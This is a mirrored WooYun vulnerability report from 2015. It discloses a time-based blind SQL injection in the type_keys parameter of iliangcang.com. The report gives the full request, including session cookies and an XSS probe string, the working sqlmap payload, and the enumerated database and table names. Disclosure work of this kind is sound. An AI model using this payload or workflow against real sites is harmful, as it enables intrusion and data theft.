乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-21: 细节已通知厂商并且等待厂商处理中 2015-09-26: 厂商已经主动忽略漏洞,细节向公众公开
rt
GET /i/goods/?act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1,1 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.iliangcang.com:80/Cookie: PHPSESSID=ng7n8q9f3cjhu90sgc9f2fhm34; CNZZDATA1255589131=1820958677-1442496092-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1442496092; Hm_lvt_e1ff3456921b2853f7a913e1b4d776c0=1442501718,1442501963,1442502082,1442502323; Hm_lpvt_e1ff3456921b2853f7a913e1b4d776c0=1442502323; HMACCOUNT=2BF61C215E56F16E; looyu_id=674639192215e9e691bb2fb801024e6986_53645%3A1; looyu_53645=v%3A674639192215e9e691bb2fb801024e6986%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m188.looyu.com/monitor; _jzqco=%7C%7C%7C%7C%7C1.1235655964.1442499463200.1442501593179.1442502323250.1442501593179.1442502323250.0.0.0.7.7; __utmt=1; __utma=248775135.1341662073.1442499463.1442499463.1442499463.1; __utmb=248775135.6.10.1442499463; __utmc=248775135; __utmz=248775135.1442499463.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); MECHAT_LVTime=1442502323318; MECHAT_CKID=cookieVal=006600144249962600255771; MECHAT-OLDFRIEND=trueHost: www.iliangcang.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
type_keys参数存在注入
sqlmap identified the following injection point(s) with a total of 152 HTTP(s) requests:---Parameter: type_keys (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ---web application technology: PHP 5.5.23back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: type_keys (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ---web application technology: PHP 5.5.23back-end DBMS: MySQL 5.0.12available databases [3]:[*] information_schema[*] jliangcang[*] test
back-end DBMS: MySQL 5.0.12available databases [3]:[*] information_schema[*] jliangcang[*] testDatabase: jliangcang[35 tables]+-----------------------+| CPG_filetypes || ClassificationNode || DEPT || EPIXEIRISI || Economy || ORDERS || ORDERSTATUS || SALES || Parameter || session || bombing || business || companies || cv_pests_diseases || dtb_send_history || e107_user || experimental_data_set || ezin_users || help_topic || identification || item_master_seq || medicalprocedure || mushroom_test_results || object || passwords || pricegroup || principal || queries || records || region || tag || tbl_event || tf_settings || userlist || vendor_types |+-----------------------+
危害等级:无影响厂商忽略
忽略时间:2015-09-26 23:10
漏洞Rank:4 (WooYun评价)
暂无